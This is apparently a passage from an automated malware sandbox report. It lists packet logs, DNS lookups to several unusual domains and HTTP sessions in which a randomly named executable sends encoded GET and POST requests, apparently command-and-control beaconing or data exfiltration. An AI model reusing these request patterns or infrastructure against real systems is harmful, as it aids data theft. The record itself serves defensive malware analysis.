                        Oct 9, 2024 12:43:13.274863958 CEST804998723.224.37.78192.168.2.6
                        Oct 9, 2024 12:43:13.862834930 CEST804998723.224.37.78192.168.2.6
                        Oct 9, 2024 12:43:13.862895966 CEST4998780192.168.2.623.224.37.78
                        Oct 9, 2024 12:43:14.772306919 CEST4998780192.168.2.623.224.37.78
                        Oct 9, 2024 12:43:14.777543068 CEST804998723.224.37.78192.168.2.6
                        Oct 9, 2024 12:43:15.791898012 CEST4998980192.168.2.623.224.37.78
                        Oct 9, 2024 12:43:15.797041893 CEST804998923.224.37.78192.168.2.6
                        Oct 9, 2024 12:43:15.797143936 CEST4998980192.168.2.623.224.37.78
                        Oct 9, 2024 12:43:15.809859991 CEST4998980192.168.2.623.224.37.78
                        Oct 9, 2024 12:43:15.815514088 CEST804998923.224.37.78192.168.2.6
                        Oct 9, 2024 12:43:15.815531015 CEST804998923.224.37.78192.168.2.6
                        Oct 9, 2024 12:43:16.407078981 CEST804998923.224.37.78192.168.2.6
                        Oct 9, 2024 12:43:16.407224894 CEST4998980192.168.2.623.224.37.78
                        Oct 9, 2024 12:43:17.319348097 CEST4998980192.168.2.623.224.37.78
                        Oct 9, 2024 12:43:17.324548960 CEST804998923.224.37.78192.168.2.6
                        Oct 9, 2024 12:43:18.337930918 CEST4999180192.168.2.623.224.37.78
                        Oct 9, 2024 12:43:18.342959881 CEST804999123.224.37.78192.168.2.6
                        Oct 9, 2024 12:43:18.343059063 CEST4999180192.168.2.623.224.37.78
                        Oct 9, 2024 12:43:18.350198984 CEST4999180192.168.2.623.224.37.78
                        Oct 9, 2024 12:43:18.355154991 CEST804999123.224.37.78192.168.2.6
                        Oct 9, 2024 12:43:18.973670959 CEST804999123.224.37.78192.168.2.6
                        Oct 9, 2024 12:43:18.973789930 CEST4999180192.168.2.623.224.37.78
                        Oct 9, 2024 12:43:18.974988937 CEST4999180192.168.2.623.224.37.78
                        Oct 9, 2024 12:43:18.979880095 CEST804999123.224.37.78192.168.2.6
                        Oct 9, 2024 12:43:24.029934883 CEST4999280192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:24.034759998 CEST804999252.187.43.40192.168.2.6
                        Oct 9, 2024 12:43:24.034861088 CEST4999280192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:24.045321941 CEST4999280192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:24.050321102 CEST804999252.187.43.40192.168.2.6
                        Oct 9, 2024 12:43:25.184266090 CEST804999252.187.43.40192.168.2.6
                        Oct 9, 2024 12:43:25.184314966 CEST804999252.187.43.40192.168.2.6
                        Oct 9, 2024 12:43:25.184366941 CEST804999252.187.43.40192.168.2.6
                        Oct 9, 2024 12:43:25.184454918 CEST4999280192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:25.184479952 CEST4999280192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:25.553467035 CEST4999280192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:26.572062969 CEST4999380192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:26.577013969 CEST804999352.187.43.40192.168.2.6
                        Oct 9, 2024 12:43:26.577135086 CEST4999380192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:26.587732077 CEST4999380192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:26.592967033 CEST804999352.187.43.40192.168.2.6
                        Oct 9, 2024 12:43:27.667495012 CEST804999352.187.43.40192.168.2.6
                        Oct 9, 2024 12:43:27.668366909 CEST804999352.187.43.40192.168.2.6
                        Oct 9, 2024 12:43:27.668580055 CEST4999380192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:28.100436926 CEST4999380192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:29.120043993 CEST4999480192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:29.125894070 CEST804999452.187.43.40192.168.2.6
                        Oct 9, 2024 12:43:29.126025915 CEST4999480192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:29.136642933 CEST4999480192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:29.143913984 CEST804999452.187.43.40192.168.2.6
                        Oct 9, 2024 12:43:29.144824028 CEST804999452.187.43.40192.168.2.6
                        Oct 9, 2024 12:43:30.238106012 CEST804999452.187.43.40192.168.2.6
                        Oct 9, 2024 12:43:30.238226891 CEST804999452.187.43.40192.168.2.6
                        Oct 9, 2024 12:43:30.238312960 CEST4999480192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:30.647134066 CEST4999480192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:31.665972948 CEST4999580192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:31.670908928 CEST804999552.187.43.40192.168.2.6
                        Oct 9, 2024 12:43:31.671072960 CEST4999580192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:31.677375078 CEST4999580192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:31.682296991 CEST804999552.187.43.40192.168.2.6
                        Oct 9, 2024 12:43:32.782501936 CEST804999552.187.43.40192.168.2.6
                        Oct 9, 2024 12:43:32.782529116 CEST804999552.187.43.40192.168.2.6
                        Oct 9, 2024 12:43:32.782721043 CEST4999580192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:32.785409927 CEST4999580192.168.2.652.187.43.40
                        Oct 9, 2024 12:43:32.790251017 CEST804999552.187.43.40192.168.2.6
                        Oct 9, 2024 12:43:38.341674089 CEST4999680192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:38.346748114 CEST8049996199.192.21.169192.168.2.6
                        Oct 9, 2024 12:43:38.346853018 CEST4999680192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:38.357306004 CEST4999680192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:38.362302065 CEST8049996199.192.21.169192.168.2.6
                        Oct 9, 2024 12:43:38.961229086 CEST8049996199.192.21.169192.168.2.6
                        Oct 9, 2024 12:43:38.961401939 CEST8049996199.192.21.169192.168.2.6
                        Oct 9, 2024 12:43:38.961474895 CEST4999680192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:39.866029978 CEST4999680192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:40.885129929 CEST4999780192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:40.890094042 CEST8049997199.192.21.169192.168.2.6
                        Oct 9, 2024 12:43:40.890194893 CEST4999780192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:40.900551081 CEST4999780192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:40.905437946 CEST8049997199.192.21.169192.168.2.6
                        Oct 9, 2024 12:43:41.496917009 CEST8049997199.192.21.169192.168.2.6
                        Oct 9, 2024 12:43:41.497009993 CEST8049997199.192.21.169192.168.2.6
                        Oct 9, 2024 12:43:41.497091055 CEST4999780192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:42.412851095 CEST4999780192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:43.432629108 CEST4999980192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:43.437613010 CEST8049999199.192.21.169192.168.2.6
                        Oct 9, 2024 12:43:43.437943935 CEST4999980192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:43.452348948 CEST4999980192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:43.457216024 CEST8049999199.192.21.169192.168.2.6
                        Oct 9, 2024 12:43:43.457283020 CEST8049999199.192.21.169192.168.2.6
                        Oct 9, 2024 12:43:44.039936066 CEST8049999199.192.21.169192.168.2.6
                        Oct 9, 2024 12:43:44.039957047 CEST8049999199.192.21.169192.168.2.6
                        Oct 9, 2024 12:43:44.040117979 CEST4999980192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:44.959678888 CEST4999980192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:45.979716063 CEST5000080192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:45.984895945 CEST8050000199.192.21.169192.168.2.6
                        Oct 9, 2024 12:43:45.984993935 CEST5000080192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:45.992479086 CEST5000080192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:45.997412920 CEST8050000199.192.21.169192.168.2.6
                        Oct 9, 2024 12:43:46.570646048 CEST8050000199.192.21.169192.168.2.6
                        Oct 9, 2024 12:43:46.570662022 CEST8050000199.192.21.169192.168.2.6
                        Oct 9, 2024 12:43:46.570816994 CEST5000080192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:46.573487997 CEST5000080192.168.2.6199.192.21.169
                        Oct 9, 2024 12:43:46.578712940 CEST8050000199.192.21.169192.168.2.6
                        Oct 9, 2024 12:43:51.640295029 CEST5000180192.168.2.681.2.196.19
                        Oct 9, 2024 12:43:51.646261930 CEST805000181.2.196.19192.168.2.6
                        Oct 9, 2024 12:43:51.646337032 CEST5000180192.168.2.681.2.196.19
                        Oct 9, 2024 12:43:51.660274982 CEST5000180192.168.2.681.2.196.19
                        Oct 9, 2024 12:43:51.666407108 CEST805000181.2.196.19192.168.2.6
                        Oct 9, 2024 12:43:52.321367979 CEST805000181.2.196.19192.168.2.6
                        Oct 9, 2024 12:43:52.321398973 CEST805000181.2.196.19192.168.2.6
                        Oct 9, 2024 12:43:52.321727037 CEST5000180192.168.2.681.2.196.19
                        Oct 9, 2024 12:43:53.166203976 CEST5000180192.168.2.681.2.196.19
                        Oct 9, 2024 12:43:54.181973934 CEST5000280192.168.2.681.2.196.19
                        Oct 9, 2024 12:43:54.187156916 CEST805000281.2.196.19192.168.2.6
                        Oct 9, 2024 12:43:54.187239885 CEST5000280192.168.2.681.2.196.19
                        Oct 9, 2024 12:43:54.198178053 CEST5000280192.168.2.681.2.196.19
                        Oct 9, 2024 12:43:54.203353882 CEST805000281.2.196.19192.168.2.6
                        Oct 9, 2024 12:43:54.850873947 CEST805000281.2.196.19192.168.2.6
                        Oct 9, 2024 12:43:54.850920916 CEST805000281.2.196.19192.168.2.6
                        Oct 9, 2024 12:43:54.851003885 CEST5000280192.168.2.681.2.196.19
                        Oct 9, 2024 12:43:55.709696054 CEST5000280192.168.2.681.2.196.19
                        Oct 9, 2024 12:43:56.730281115 CEST5000380192.168.2.681.2.196.19
                        Oct 9, 2024 12:43:56.797858000 CEST805000381.2.196.19192.168.2.6
                        Oct 9, 2024 12:43:56.798012972 CEST5000380192.168.2.681.2.196.19
                        Oct 9, 2024 12:43:56.810240984 CEST5000380192.168.2.681.2.196.19
                        Oct 9, 2024 12:43:56.815217972 CEST805000381.2.196.19192.168.2.6
                        Oct 9, 2024 12:43:56.815234900 CEST805000381.2.196.19192.168.2.6
                        Oct 9, 2024 12:43:57.481805086 CEST805000381.2.196.19192.168.2.6
                        Oct 9, 2024 12:43:57.482006073 CEST805000381.2.196.19192.168.2.6
                        Oct 9, 2024 12:43:57.482058048 CEST5000380192.168.2.681.2.196.19
                        Oct 9, 2024 12:43:58.319087029 CEST5000380192.168.2.681.2.196.19
                        Oct 9, 2024 12:43:59.338345051 CEST5000480192.168.2.681.2.196.19
                        Oct 9, 2024 12:43:59.343358994 CEST805000481.2.196.19192.168.2.6
                        Oct 9, 2024 12:43:59.343432903 CEST5000480192.168.2.681.2.196.19
                        Oct 9, 2024 12:43:59.352420092 CEST5000480192.168.2.681.2.196.19
                        Oct 9, 2024 12:43:59.357434988 CEST805000481.2.196.19192.168.2.6
                        Oct 9, 2024 12:44:00.019073963 CEST805000481.2.196.19192.168.2.6
                        Oct 9, 2024 12:44:00.019089937 CEST805000481.2.196.19192.168.2.6
                        Oct 9, 2024 12:44:00.019227028 CEST5000480192.168.2.681.2.196.19
                        Oct 9, 2024 12:44:00.022932053 CEST5000480192.168.2.681.2.196.19
                        Oct 9, 2024 12:44:00.027894020 CEST805000481.2.196.19192.168.2.6
                        TimestampSource PortDest PortSource IPDest IP
                        Oct 9, 2024 12:42:54.548372030 CEST5942653192.168.2.61.1.1.1
                        Oct 9, 2024 12:42:54.573771954 CEST53594261.1.1.1192.168.2.6
                        Oct 9, 2024 12:43:10.103714943 CEST6152653192.168.2.61.1.1.1
                        Oct 9, 2024 12:43:10.687371016 CEST53615261.1.1.1192.168.2.6
                        Oct 9, 2024 12:43:23.978972912 CEST5366953192.168.2.61.1.1.1
                        Oct 9, 2024 12:43:24.027398109 CEST53536691.1.1.1192.168.2.6
                        Oct 9, 2024 12:43:37.791745901 CEST6173653192.168.2.61.1.1.1
                        Oct 9, 2024 12:43:38.338673115 CEST53617361.1.1.1192.168.2.6
                        Oct 9, 2024 12:43:51.588749886 CEST5765753192.168.2.61.1.1.1
                        Oct 9, 2024 12:43:51.637413979 CEST53576571.1.1.1192.168.2.6
                        Oct 9, 2024 12:44:06.151266098 CEST6427353192.168.2.61.1.1.1
                        Oct 9, 2024 12:44:06.631656885 CEST53642731.1.1.1192.168.2.6
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Oct 9, 2024 12:42:54.548372030 CEST192.168.2.61.1.1.10x42d6Standard query (0)www.whats-in-the-box.orgA (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:10.103714943 CEST192.168.2.61.1.1.10x4b28Standard query (0)www.1183377.appA (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:23.978972912 CEST192.168.2.61.1.1.10x70c4Standard query (0)www.52ywq.vipA (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:37.791745901 CEST192.168.2.61.1.1.10xecd4Standard query (0)www.zenscape.topA (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:51.588749886 CEST192.168.2.61.1.1.10xced9Standard query (0)www.asociacia.onlineA (IP address)IN (0x0001)false
                        Oct 9, 2024 12:44:06.151266098 CEST192.168.2.61.1.1.10xa32dStandard query (0)www.93187.xyzA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Oct 9, 2024 12:42:54.573771954 CEST1.1.1.1192.168.2.60x42d6No error (0)www.whats-in-the-box.orgwhats-in-the-box.orgCNAME (Canonical name)IN (0x0001)false
                        Oct 9, 2024 12:42:54.573771954 CEST1.1.1.1192.168.2.60x42d6No error (0)whats-in-the-box.org3.33.130.190A (IP address)IN (0x0001)false
                        Oct 9, 2024 12:42:54.573771954 CEST1.1.1.1192.168.2.60x42d6No error (0)whats-in-the-box.org15.197.148.33A (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:10.687371016 CEST1.1.1.1192.168.2.60x4b28No error (0)www.1183377.appr83l7k.asiagoogleantiddoscdn.comCNAME (Canonical name)IN (0x0001)false
                        Oct 9, 2024 12:43:10.687371016 CEST1.1.1.1192.168.2.60x4b28No error (0)r83l7k.asiagoogleantiddoscdn.comhse6978h2.g.asiagoogleantiddoscdn.comCNAME (Canonical name)IN (0x0001)false
                        Oct 9, 2024 12:43:10.687371016 CEST1.1.1.1192.168.2.60x4b28No error (0)hse6978h2.g.asiagoogleantiddoscdn.com23.224.37.78A (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:10.687371016 CEST1.1.1.1192.168.2.60x4b28No error (0)hse6978h2.g.asiagoogleantiddoscdn.com23.225.60.59A (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:10.687371016 CEST1.1.1.1192.168.2.60x4b28No error (0)hse6978h2.g.asiagoogleantiddoscdn.com23.225.60.99A (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:10.687371016 CEST1.1.1.1192.168.2.60x4b28No error (0)hse6978h2.g.asiagoogleantiddoscdn.com156.251.233.3A (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:10.687371016 CEST1.1.1.1192.168.2.60x4b28No error (0)hse6978h2.g.asiagoogleantiddoscdn.com156.251.233.84A (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:10.687371016 CEST1.1.1.1192.168.2.60x4b28No error (0)hse6978h2.g.asiagoogleantiddoscdn.com156.251.233.85A (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:10.687371016 CEST1.1.1.1192.168.2.60x4b28No error (0)hse6978h2.g.asiagoogleantiddoscdn.com23.224.27.171A (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:10.687371016 CEST1.1.1.1192.168.2.60x4b28No error (0)hse6978h2.g.asiagoogleantiddoscdn.com23.224.27.173A (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:10.687371016 CEST1.1.1.1192.168.2.60x4b28No error (0)hse6978h2.g.asiagoogleantiddoscdn.com23.224.37.76A (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:24.027398109 CEST1.1.1.1192.168.2.60x70c4No error (0)www.52ywq.vip2rqff6.zxy-cname.comCNAME (Canonical name)IN (0x0001)false
                        Oct 9, 2024 12:43:24.027398109 CEST1.1.1.1192.168.2.60x70c4No error (0)2rqff6.zxy-cname.comxzwp.g.zxy-cname.comCNAME (Canonical name)IN (0x0001)false
                        Oct 9, 2024 12:43:24.027398109 CEST1.1.1.1192.168.2.60x70c4No error (0)xzwp.g.zxy-cname.com52.187.43.40A (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:24.027398109 CEST1.1.1.1192.168.2.60x70c4No error (0)xzwp.g.zxy-cname.com20.184.51.15A (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:24.027398109 CEST1.1.1.1192.168.2.60x70c4No error (0)xzwp.g.zxy-cname.com52.187.42.58A (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:24.027398109 CEST1.1.1.1192.168.2.60x70c4No error (0)xzwp.g.zxy-cname.com20.190.75.237A (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:24.027398109 CEST1.1.1.1192.168.2.60x70c4No error (0)xzwp.g.zxy-cname.com20.184.53.162A (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:24.027398109 CEST1.1.1.1192.168.2.60x70c4No error (0)xzwp.g.zxy-cname.com52.230.116.182A (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:38.338673115 CEST1.1.1.1192.168.2.60xecd4No error (0)www.zenscape.top199.192.21.169A (IP address)IN (0x0001)false
                        Oct 9, 2024 12:43:51.637413979 CEST1.1.1.1192.168.2.60xced9No error (0)www.asociacia.onlineasociacia.onlineCNAME (Canonical name)IN (0x0001)false
                        Oct 9, 2024 12:43:51.637413979 CEST1.1.1.1192.168.2.60xced9No error (0)asociacia.online81.2.196.19A (IP address)IN (0x0001)false
                        Oct 9, 2024 12:44:06.631656885 CEST1.1.1.1192.168.2.60xa32dNo error (0)www.93187.xyz107.163.130.249A (IP address)IN (0x0001)false
                        • www.whats-in-the-box.org
                        • www.1183377.app
                        • www.52ywq.vip
                        • www.zenscape.top
                        • www.asociacia.online
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.6499823.33.130.190801588C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe
                        TimestampBytes transferredDirectionData
                        Oct 9, 2024 12:42:54.592124939 CEST491OUTGET /i7xp/?rtR8=1hYOXgym/+H9levAkr4ECV6rOYKZY3gLAuBEPSFmNBWW1UoBGm7krMakoIf2T8PCbakGk5cJYsK9Iz90f+Byzfi/m2yAgZsx+DVOuREzU+smRqm89Sbv2/YQlh4Vkdpr1W2vE6w=&0Xm=T0UhHtW0dnoXGz2p HTTP/1.1
                        Host: www.whats-in-the-box.org
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US
                        Connection: close
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                        Oct 9, 2024 12:42:55.051175117 CEST417INHTTP/1.1 200 OK
                        Server: openresty
                        Date: Wed, 09 Oct 2024 10:42:55 GMT
                        Content-Type: text/html
                        Content-Length: 277
                        Connection: close
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 72 74 52 38 3d 31 68 59 4f 58 67 79 6d 2f 2b 48 39 6c 65 76 41 6b 72 34 45 43 56 36 72 4f 59 4b 5a 59 33 67 4c 41 75 42 45 50 53 46 6d 4e 42 57 57 31 55 6f 42 47 6d 37 6b 72 4d 61 6b 6f 49 66 32 54 38 50 43 62 61 6b 47 6b 35 63 4a 59 73 4b 39 49 7a 39 30 66 2b 42 79 7a 66 69 2f 6d 32 79 41 67 5a 73 78 2b 44 56 4f 75 52 45 7a 55 2b 73 6d 52 71 6d 38 39 53 62 76 32 2f 59 51 6c 68 34 56 6b 64 70 72 31 57 32 76 45 36 77 3d 26 30 58 6d 3d 54 30 55 68 48 74 57 30 64 6e 6f 58 47 7a 32 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?rtR8=1hYOXgym/+H9levAkr4ECV6rOYKZY3gLAuBEPSFmNBWW1UoBGm7krMakoIf2T8PCbakGk5cJYsK9Iz90f+Byzfi/m2yAgZsx+DVOuREzU+smRqm89Sbv2/YQlh4Vkdpr1W2vE6w=&0Xm=T0UhHtW0dnoXGz2p"}</script></head></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.64998623.224.37.78801588C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe
                        TimestampBytes transferredDirectionData
                        Oct 9, 2024 12:43:10.710119009 CEST731OUTPOST /8z5k/ HTTP/1.1
                        Host: www.1183377.app
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US
                        Accept-Encoding: gzip, deflate, br
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: no-cache
                        Connection: close
                        Content-Length: 209
                        Origin: http://www.1183377.app
                        Referer: http://www.1183377.app/8z5k/
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                        Data Raw: 72 74 52 38 3d 2f 33 79 6d 58 72 5a 75 73 51 2f 74 72 2b 34 33 68 4f 5a 54 39 46 6d 68 35 33 41 64 48 38 6d 51 6b 64 75 67 41 4e 49 5a 7a 58 52 62 4a 55 66 55 5a 46 6c 49 45 4b 64 32 61 43 38 68 6c 46 42 2f 76 53 65 57 63 78 32 30 58 44 43 36 6e 63 70 6e 45 78 61 65 5a 78 57 33 67 57 4a 71 6d 42 36 57 75 4f 78 73 72 36 55 55 56 30 37 6b 53 2b 56 68 64 5a 6e 47 31 43 6f 42 35 50 61 72 6f 79 78 48 46 4d 51 58 4e 41 2f 6a 62 5a 78 4b 43 39 72 6e 50 49 72 6a 37 6d 35 61 37 67 45 63 45 4f 68 75 37 5a 66 4f 4f 35 48 38 41 77 55 46 74 32 34 68 37 2f 55 52 6a 77 66 53 39 45 39 65 46 76 4b 32 42 63 76 31 4b 51 53 56 6d 6c 47 41
                        Data Ascii: rtR8=/3ymXrZusQ/tr+43hOZT9Fmh53AdH8mQkdugANIZzXRbJUfUZFlIEKd2aC8hlFB/vSeWcx20XDC6ncpnExaeZxW3gWJqmB6WuOxsr6UUV07kS+VhdZnG1CoB5ParoyxHFMQXNA/jbZxKC9rnPIrj7m5a7gEcEOhu7ZfOO5H8AwUFt24h7/URjwfS9E9eFvK2Bcv1KQSVmlGA


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.64998723.224.37.78801588C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe
                        TimestampBytes transferredDirectionData
                        Oct 9, 2024 12:43:13.269772053 CEST755OUTPOST /8z5k/ HTTP/1.1
                        Host: www.1183377.app
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US
                        Accept-Encoding: gzip, deflate, br
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: no-cache
                        Connection: close
                        Content-Length: 233
                        Origin: http://www.1183377.app
                        Referer: http://www.1183377.app/8z5k/
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                        Data Raw: 72 74 52 38 3d 2f 33 79 6d 58 72 5a 75 73 51 2f 74 78 65 6f 33 78 64 78 54 30 46 6d 69 38 33 41 64 63 73 6d 71 6b 64 71 67 41 4e 67 4a 79 6b 31 62 4d 45 76 55 59 41 46 49 46 4b 64 32 56 69 39 72 71 6c 42 32 76 53 54 72 63 7a 69 30 58 48 53 36 6e 63 35 6e 46 43 43 64 57 42 57 31 31 47 4a 6f 6f 68 36 57 75 4f 78 73 72 35 6f 36 56 30 7a 6b 54 4b 70 68 64 34 6e 4a 71 79 6f 4f 78 76 61 72 73 79 78 44 46 4d 51 68 4e 46 58 46 62 62 35 4b 43 34 50 6e 50 5a 72 6b 77 6d 35 41 32 41 46 76 46 72 45 36 69 72 71 68 4b 61 69 64 66 67 52 6a 6f 41 35 37 6e 4d 55 79 78 67 2f 51 39 47 6c 73 46 50 4b 63 44 63 58 31 59 48 65 79 70 52 6a 6a 6c 33 62 50 78 30 73 52 49 49 66 75 50 56 6e 65 61 4b 32 63 74 51 3d 3d
                        Data Ascii: rtR8=/3ymXrZusQ/txeo3xdxT0Fmi83AdcsmqkdqgANgJyk1bMEvUYAFIFKd2Vi9rqlB2vSTrczi0XHS6nc5nFCCdWBW11GJooh6WuOxsr5o6V0zkTKphd4nJqyoOxvarsyxDFMQhNFXFbb5KC4PnPZrkwm5A2AFvFrE6irqhKaidfgRjoA57nMUyxg/Q9GlsFPKcDcX1YHeypRjjl3bPx0sRIIfuPVneaK2ctQ==


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.64998923.224.37.78801588C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe
                        TimestampBytes transferredDirectionData
                        Oct 9, 2024 12:43:15.809859991 CEST1768OUTPOST /8z5k/ HTTP/1.1
                        Host: www.1183377.app
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US
                        Accept-Encoding: gzip, deflate, br
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: no-cache
                        Connection: close
                        Content-Length: 1245
                        Origin: http://www.1183377.app
                        Referer: http://www.1183377.app/8z5k/
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                        Data Raw: 72 74 52 38 3d 2f 33 79 6d 58 72 5a 75 73 51 2f 74 78 65 6f 33 78 64 78 54 30 46 6d 69 38 33 41 64 63 73 6d 71 6b 64 71 67 41 4e 67 4a 79 6b 39 62 4d 56 50 55 5a 68 46 49 47 4b 64 32 63 43 39 71 71 6c 41 6b 76 53 61 67 63 7a 75 43 58 42 4f 36 68 2b 42 6e 43 7a 43 64 42 52 57 31 71 32 4a 74 6d 42 37 63 75 4f 68 6f 72 35 34 36 56 30 7a 6b 54 4d 4e 68 62 70 6e 4a 6f 79 6f 42 35 50 61 2f 6f 79 78 76 46 4d 59 66 4e 46 62 7a 62 71 5a 4b 43 59 66 6e 4e 72 7a 6b 39 6d 35 65 36 67 46 33 46 72 41 4d 69 76 4b 58 4b 62 48 77 66 6e 5a 6a 6f 6c 51 6e 2f 63 41 65 71 41 57 30 70 46 42 38 4a 50 4b 51 44 75 65 4f 4a 58 71 6e 32 6a 37 4d 71 43 44 77 30 43 31 58 41 34 66 55 51 54 43 4d 65 5a 53 51 37 77 79 44 78 7a 32 4f 69 55 4d 33 65 70 61 43 73 50 64 76 79 76 56 4a 4c 39 64 55 55 74 70 35 47 73 58 65 42 6e 4f 74 37 6c 47 36 6c 7a 55 78 37 56 73 58 54 63 76 6e 54 4a 6a 4e 4a 38 47 53 65 6c 68 59 32 4c 68 49 53 7a 59 52 66 65 39 56 4e 36 65 67 6b 7a 52 6c 38 71 58 49 37 65 73 44 48 4d 57 43 74 63 31 4e 59 63 49 34 33 [TRUNCATED]
